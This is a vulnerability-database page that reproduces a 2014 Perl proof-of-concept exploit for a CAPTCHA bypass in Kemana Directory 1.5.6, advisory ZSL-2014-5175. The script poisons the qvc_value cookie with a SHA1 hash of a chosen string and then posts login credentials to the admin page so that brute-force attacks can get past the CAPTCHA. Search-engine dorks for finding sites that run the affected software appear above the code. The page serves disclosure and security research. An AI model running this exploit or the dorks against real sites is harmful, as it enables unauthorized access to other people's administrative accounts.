Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 15 Views

Kemana Directory 1.5.6 Cookie Poisoning Bypass Exploi

Code

                                                ?#!C:\Perl64\bin\perl.exe
#
# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit
#
#
# Vendor: C97net
# Product web page: http://www.c97.net
# Affected version: 1.5.6
#
# Summary: Experience the ultimate directory script solution with Kemana.
# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features
# including: CMS engine based on our qEngine, multiple directories support,
# user friendly administration control panel, easy to use custom fields,
# unsurpassed flexibility.
#
# Desc: The CAPTCHA function for Kemana Directory is prone to a security
# bypass vulnerability that occurs in the CAPTCHA authentication routine.
# The function 'qvc_init()' in '/includes/function.php' sets a cookie with
# a SHA1-based hash value in the Response Header which can be replaced by
# a random SHA1 computed hash value using Cookie Poisoning attack. Successful
# exploit will allow attackers to bypass the CAPTCHA-based authentication
# challenge and perform brute-force attacks.
#
#
# =============================================================================
# /includes/function.php:
# -----------------------
#
# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */
# 1775:
# 1776:
# 1777: // qVC - the simplest visual confirmation engine yet
# 1778: // use qvc_init() --> <img src="visual.php"> --> compare qvc_value() == sha1 (strtolower($user_input) )?
# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!
# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F
# 1781: function qvc_init ($num = 5)
# 1782: {
# 1783: 	if ($num == 3)
# 1784: 		$value = mt_rand (100, 999);
# 1785: 	else
# 1786: 		$value = random_str (5);
# 1787: 	ip_config_update ('visual', $value);
# 1788: 	setcookie ('qvc_value', sha1 ($value), 0, '/');
# 1789: }
# 1790: 
# 1791: 
# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)
# 1793: function qvc_value ()
# 1794: {
# 1795: 	$correct_val = cookie_param ('qvc_value');
# 1796: 
# 1797: 	// block browser BACK
# 1798: 	qvc_init ();
# 1799: 	return $correct_val;
# 1800: }
# =============================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#            Apache/2.4.7 (Win32)
#            PHP/5.5.6
#            MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2014-5175
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php
#
#
# Dork #1: intitle:powered by c97.net
# Dork #2: intitle:powered by qEngine
# Dork #3: intitle:powered by Kemana.c97.net
# Dork #4: intitle:powered by Cart2.c97.net
#
#
# 08.03.2014
#


use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03
$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass=
"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar);
print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_
print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1
print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].
=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";
"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";
$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string
;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$
juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get;
"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\
info(){print"
 +-----------------------------------------------------+
 |                                                     |
 |     Kemana Directory CAPTCHA Bypass PoC Exploit     |
 |                                                     |
 |                  ID: ZSL-2014-5175                  |
 |                                                     |
 +-----------------------------------------------------+
 \n\n";}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
kemana directorycookie poisoningbypass exploitcaptchavulnerabilityc97netqvc_init()lwphttp cookies
15